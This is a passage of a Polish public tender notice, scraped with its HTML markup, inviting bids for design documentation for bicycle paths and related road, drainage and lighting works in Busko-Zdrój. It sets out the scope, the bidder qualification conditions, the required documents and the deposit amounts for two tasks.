dokumentacji projektowej oświadczenia, że dokumentacja projektowa jest wykonana zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi i normami oraz, że jest kompletna z punktu widzenia celu, któremu ma służyć.8.	Dokumentację projektową należy wykonać zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej, zapisami miejscowych planów zagospodarowania przestrzennego, uzyskanymi decyzjami lokalizacji inwestycji celu publicznego, warunkami technicznymi (z uwzględnieniem zmian w przepisach w trakcie realizacji zamówienia), a w szczególności:	- ustawą z dnia 29 stycznia 2004r. Prawo zamówień publicznych oraz aktami wykonawczymi do tej ustawy, ze szczególnym uwzględnieniem przepisów art. 29 ust. 1-3 i art. 30 ust. 1-5 ustawy - ustawą z dnia 7 lipca 1994r. Prawo budowlane oraz aktami wykonawczymi do tej ustawy.9.	Kompletna dokumentacja projektowa objęta przedmiotem zamówienia musi umożliwiać przeprowadzenie postępowania o udzielenie zamówienia publicznego na wyłonienie wykonawcy robót zgodnie z ustawą Prawo zamówień publicznych. 10.	Opracowana dokumentacja projektowa będzie służyła do opisania przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego na roboty budowlane. Wykonawca nie może wskazywać w dokumentacji projektowej (w szczególności w specyfikacjach technicznych) nazw własnych produktów bądź producentów dotyczących określonych modeli, systemów, elementów, materiałów, urządzeń itp.11.	Zakres prac projektowych z uwzględnieniem warunków zagospodarowania terenu:11.1 Zadanie 1 1)	Ścieżka rowerowa w pasie drogowym ulicy Starkiewicza w Busku-Zdroju na odcinku od skrzyżowania z DW Nr 973 do skrzyżowania z ul. Grotta długości około 960m, zlokalizowana na działkach ewidencyjnych nr 209 obręb 13 Busko-Zdrój i nr 5/2 obręb 14 Busko-Zdrój, z uwzględnieniem:- przebudowę istniejącej jezdni, chodników, zjazdów indywidualnych, zatok autobusowych i poboczy w zakresie warstw konstrukcyjnych, parametrów technicznych jak również korekty wysokościowej niwelety.- uporządkowanie gospodarki wodami opadowymi z przyległej zlewni miejskiej poprzez budowę sieci kanalizacji deszczowej długości około 450,0m, przebudowę istniejącego rowu melioracyjnego oraz budowę kolektora zbiorczego na długości około 270,0m dla wód opadowych z ulic Grotta, Korczyńskiej, 1 -ego Maja, Ceglanej i terenów przewidzianych pod zabudowę w ramach MPZP.- przebudowę istniejącej linii kablowej oświetlenia ulicznego na długości około 960,0m,- przebudowę kolidującej infrastruktury technicznej podziemnej i nadziemnej jak sieci wodociągowe, sieci kanalizacyjne, gazowe, energetyczne telekomunikacyjne itp,-przebudowę skrzyżowań z drogami publicznymi, (ulica Rokosza, Rehabilitacyjna, Rzewuskiego, 1-ego Maja, oraz ul. Korczyńska)- docelowa zmiana organizacji ruchu.2)	Ścieżka rowerowa w pasie drogowym ulicy Rehabilitacyjnej w Busku-Zdroju na odcinku od skrzyżowania z ul. Starkiewicza do skrzyżowania z ul. Zdrojową długości około 730m, zlokalizowana na działkach ewidencyjnych nr 4/1, 4/2, 4/3, 4/4, 639 i 87/4 obręb 14 Busko-Zdrój z uwzględnieniem:- przebudowę jezdni, budowę i przebudowę chodników, zjazdów indywidualnych na istniejącym odcinku ulicy, w zakresie warstw konstrukcyjnych, parametrów technicznych jak również korekty wysokościowej,- rozbudowę ulicy Rehabilitacyjnej na długości około 380,0m poprzez budowę łącznika z ul. Zdrojową w tym jezdnia szer. 5,5m, jednostronny chodnik, zjazdy indywidualne, mur oporowy na odcinku budynku Szkolno-Wychowawczego ,,GÓRKA",- przebudowę istniejącego ciągu komunikacji pieszej wraz ze schodami terenowymi na os. GÓRKA, - budowę sieci kanalizacji deszczowej na długości około 680,0m, - budowę linii kablowej oświetlenia ulicznego na długości około 720,0m,- przebudowę skrzyżowań z drogami publicznymi i wewnętrznymi, z uwzględnieniem opracowanych dokumentacji projektowych,- docelowa zmiana organizacji ruchu.3)	Ścieżka rowerowa w pasie drogowym ulicy 1-ego Maja w Busku-Zdroju na odcinku od skrzyżowania z ul. Starkiewicza do skrzyżowania z ul. Rzewuskiego długości około 450m zlokalizowana na działkach ewidencyjnych nr 566 obręb 9 Busko-Zdrój z uwzględnieniem:- przebudowę jezdni, obustronnych chodników, zjazdów w zakresie warstw konstrukcyjnych, parametrów technicznych jak również korekty wysokościowej,- budowę sieci kanalizacji deszczowej długości około 930,0m, na odcinku od skrzyżowania z ul. 12 Stycznia do skrzyżowania z ul. Starkiewicza wraz z wylotem kanalizacyjnym i podczyszczalnią wód deszczowych - przebudowę istniejącej linii kablowej oświetlenia ulicznego długości około 430,0m,- docelowa zmiana organizacji ruchu.4)	Ścieżka rowerowa w pasie drogowym ulicy Strażackiej w Zbludowicach na długości około 380m zlokalizowana na działkach ewidencyjnych nr 664 obręb 43 Zbludowice z uwzględnieniem:- przebudowę zjazdów na istniejącym odcinku ulicy,- docelowa zmiana organizacji ruchu.11.2 Zadanie 2: 1)	Ścieżka rowerowa w pasie drogowym ulicy Lipowej w Busku-Zdroju na odcinku od skrzyżowania z ul. Rokosza do skrzyżowania z ul. Waryńskiego oraz na terenie Parku Zdrojowego długości około 750m zlokalizowana na działkach ewidencyjnych nr 91/1 i 202 obręb 13 Busko-Zdrój, z uwzględnieniem:- przebudowę istniejącego ciągu pieszego na ciąg pieszo-rowerowy w tym wykonanie odcinka wydzielonej ścieżki rowerowej na terenie Parku Zdrojowego,- przebudowę oświetlenia ulicznego,- docelowa zmiana organizacji ruchu.2)	Ścieżka rowerowa w pasie drogowym ulicy Rokosza w Busku-Zdroju na odcinku od skrzyżowania z ul. Lipową do skrzyżowania z ul. Waryńskiego długości około 970m zlokalizowana na działkach ewidencyjnych nr 207/1, 207/2, 201/1, obręb 13 Busko-Zdrój z uwzględnieniem:- przebudowę jezdni, przebudowę chodników, zjazdów na istniejącym odcinku ulicy,- rozbudowę ulicy Rokosza (obejmującą działki nr ewid. 256/5, 267/1 i 267/2 obręb ewid. nr 12 Busko-Zdrój, na odcinku długości około 550m do ul. Waryńskiego w tym jezdnia szer. 5,5m, jednostronny chodnik, ścieżka rowerowa oraz zjazdy indywidualne,- rozbudowę ulicy Rokosza na odcinku długości około 250m do ul. Solankowej w tym jezdnia szer. 5,5m, jednostronny chodnik, ścieżka rowerowa oraz zjazdy indywidualne,- przebudowę istniejącej sieci kanalizacji deszczowej na odcinku 340,0m, oraz rozbudowę sieci kanalizacji deszczowej wraz z drenażem drogowym na odcinkach o łącznej długości 835,0m obejmujących rozbudowę ulicy Rokosza,- budowę linii kablowej oświetlenia ulicznego na odcinku około 1100,0m,- przebudowę skrzyżowań z drogami publicznymi i wewnętrznymi, - docelowa zmiana organizacji ruchu.3)	Ścieżka rowerowa w pasie drogowym ulicy Waryńskiego w Busku-Zdroju na odcinku od skrzyżowania z ul. Młyńską do skrzyżowania z DW Nr 973 oraz na odcinku od ulicy Lipowej do ul. Mickiewicza o łącznej długości około 945m zlokalizowana na działkach ewidencyjnych nr 266/2 obręb 12 Busko-Zdrój, nr 197 obręb 13 Busko-Zdrój nr 91/1 i 93/3 obręb 13 Busko-Zdrój z uwzględnieniem:- przebudowę chodników, zjazdów na istniejącym odcinku ulicy,- budowę sieci kanalizacji deszczowej, - przebudowę oświetlenia ulicznego,- docelowa zmiana organizacji ruchu.4)	Ścieżka rowerowa w pasie drogowym ulicy Kusocińskiego w Busku-Zdroju na odcinku od skrzyżowania z ul. Waryńskiego do skrzyżowania z ul. Uchnasta o łącznej długości około 945m zlokalizowana na działkach ewidencyjnych nr 33/8 obręb 10 Busko-Zdrój z uwzględnieniem:- przebudowę istniejącego ciągu pieszego na ciąg pieszo-rowerowy- docelowa zmiana organizacji ruchu.I.1.1	Opracowanie dokumentacji projektowej służącej do opisu przedmiotu zamówienia - zgodnie z art. 4 ust. 2 Rozporządzenia Ministra Infrastruktury z 02.09.2004 w sprawie szczegółowego zakresu i formy dokumentacji projektowej Dz. U. z 2013 poz. 1129 z późniejszymi zmianami. Zamawiający wymaga zgodnie z postanowieniami art. 29 ustawy Pzp w zakresie opisu przedmiotu zamówienia zakazu określania materiałów sprzętu i urządzeń przez wskazywanie nazwy producenta lub innych cech wskazujących produktu, który będzie na niego wskazywał. I.1.2	Opracowanie kosztorysów inwestorskich na roboty budowlano - montażowe i konserwatorskie z podziałem na elementy uzgodnione z zamawiającym - zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z 18.05.2004 r. D.U. z 08.06.2004 r. nr 130, poz. 1389, w szczególności przedmiar robót zgodnie z art. 6 Rozp. i z uwzględnieniem Wspólnego Słownika Zamówień - art. 8 ust. 1, art. 10 ust. 1, pkt. 3.I.1.3	Opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych - zgodnie z art. 13, ust. 2 Rozporządzenia Ministra Infrastruktury z 02.09.2004 w sprawie szczegółowego zakresu i formy dokumentacji projektowej Dz. U. z 2013 r. poz.1129 z późniejszymi zmianami.I.1.4	Uzyskanie pozwoleń na budowę.I.1.5	Po stronie Wykonawcy pozostaje uzyskanie wszelkich ewentualnych dodatkowych warunków technicznych i decyzji oraz ewentualnych niezbędnych uzgodnień w zakresie wymaganym prawem, a w szczególności uzyskania geodezyjnych podkładów mapowych lub innych materiałów i informacji, warunków zasilania w media, uzgodnień, decyzji, analiz badań itp. niezbędnych do celów projektowania,I.1.6	W związku z powyższym Zamawiający udzieli Wykonawcy dokumentacji projektowej, pełnomocnictwa do występowania w imieniu Zamawiającego w w/w sprawach.I.1.7	Wykonawca zobowiązuje się do pełnienia nadzoru autorskiego nad wykonaniem robót na podstawie sporządzonej dokumentacji projektowo-kosztorysowej bez dodatkowego wynagrodzenia. I.1.8	Wykonawca w ramach udzielonego zamówienia zobowiązany będzie do określenia kryteriów oceny ofert, na podstawie, których wyłoniony zostanie Wykonawca, który będzie wykonywał roboty budowlane na podstawie dokumentacji, której opracowanie stanowi przedmiot niniejszego zamówienia. Kryteria muszą składać się z minimum 3 komponentów znaczeniowych odnoszących się, do jakości zastosowanych materiałów, urządzeń wykorzystanych do realizacji robót, aspektów oszczędności energetycznej oraz jakości wykonanych robót. Kryteria muszą mieć przyporządkowaną sumaryczną wagę znaczeniową 40 pkt. oraz opisową, niedyskryminującą formę przyznawania poszczególnych podkryteriów, do każdego z kryteriów. Kryteria muszą uzyskać akceptacje Zamawiającego.Uwaga:1)	Przedmiot zamówienia należy opracować zgodnie z wymogami aktualnie obowiązującej ustawy Prawo budowlane i Rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych i innych przepisów wykonawczych z uwzględnieniem rozwiązań zapewniających prawidłową realizację i kontrolę robót w oparciu o tą dokumentację - z wszelkimi uzgodnieniami, decyzjami, opiniami pozwalającymi na uzyskanie pozwolenia na budowę przez Wykonawcę w imieniu Zamawiającego, 2)	Dokumentacja projektowa powinna zawierać wszystkie wymagane prawem opinie, uzgodnienia i decyzje niezbędne do uzyskania pozwolenia na budowę.Wykonawca ma obowiązek konsultowania z Zamawiającym na wszystkich etapach prac, istotnych rozwiązań materiałowych oraz projektowych i architektonicznych, mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanej dokumentacji projektowej.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71220000-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71221000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71322000-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt. 6 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, o wartości do 50 % wartości zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu usług podobnych do usług stanowiących przedmiot niniejszego zamówienia.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>12</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3. - Zamawiający w tym zakresie nie stawia żadnych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Na potwierdzenie należy złożyć: oświadczenie zgodnie z założeniami w pkt. 9.3. - Zamawiający w tym zakresie nie stawia żadnych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">a)	wykonanych usług:Na potwierdzenie niniejszego warunku należy złożyć wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy;. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że;Zadanie nr 1 i 2w tym okresie wykonał jedną dokumentację projektową, w ramach, której wykonano prace projektowe związane z budową ścieżki rowerowej/ciągu pieszo-rowerowego wartość dokumentacji to minimum: dla zadania 1: 70 000,00 PLN brutto, dla zadania 2: 50 000,00 PLN brutto.UWAGA!W przypadku składania oferty na dwa zadania Wykonawca może wykazać się jedną usługą na zadania, na które składa ofertę, jeżeli sumaryczna wartość tej usługi odpowiada sumarycznej wartości opisanego warunku dla zadania 1 i 2 sumaryczna wartość wykonanej usługi to minimum 120 000,00 zł Do każdej pozycji wykazu należy załączyć dowody określające, czy usługi te zostały wykonane w sposób należyty.b)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje n/w osobami:Dla zadania od 1 do 2o	projektantem w specjalności drogowej - posiadającym uprawnienia budowlane uprawniające do projektowania.Tymi samymi osobami można wykazać się do obu zadań.Do oferty należy dołączyć oświadczenie Wykonawcy, że zaproponowane osoby posiadają wymagane uprawnienia i przynależą do właściwej izby samorządu zawodowego, jeżeli taki wymóg na te osoby nakłada Prawo budowlane.Zgodnie z art. 12a Prawa budowlanego, który to odsyła do ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z dnia 17 kwietnia 2008 r. ze zm.) przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależności do izby samorządu zawodowego.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 ustawy.2)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa powyżej w pkt. 1), składa odpowiednio, że:a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,b)	dokumenty, o których mowa powyżej w pkt. a) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.c)	jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub w kraju, w którym miejsce zamieszkania mają osoby, których dotyczy dokument, wskazany nie wydaje się dokumentu, o których mowa w pkt. a) zastępuje się je dokumentem zawierającym oświadczenie, odpowiednio wykonawcy, ze wskazaniem osób uprawnionych do jego reprezentacji, lub oświadczeniem tych osób, złożonym przed notariuszem lub przed właściwym - ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tych osób - organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego. Przepis pkt b) stosuje się odpowiednio.3) Wykonawca, który polega na zasobach innych podmiotów składa dokumenty o braku podstaw do wykluczenia w odniesieniu do tych podmiotów (dokumenty te zostały określone w pkt. 9.4.4 SIWZ).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) Wykaz usług wykonanych w okresie ostatnich 3 lat, zgodnie z opisanym warunkiem w pkt. 9.4.2 a) SIWZ należy przedstawić wg wzoru załącznik nr 6 do SIWZ;2) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego zgodnie z opisanym warunkiem w pkt. 9.4.2 b) SIWZ należy przedstawić wg wzoru załącznik nr 7 do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy, wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej, na której udostępniono SIWZ informacji o ofertach złożonych w postępowaniu zgodnie z art. 86 ust. 5 ustawy, składa stosownie do treści art. 24 ust. 11 ustawy, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Dla zadania 1: 3 000,00 PLN (słownie: trzy tysiące złotych)Dla zadania 2: 2 000,00 PLN (słownie: dwa tysiące złotych)- należy wnieść przed upływem terminu składania ofert.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy 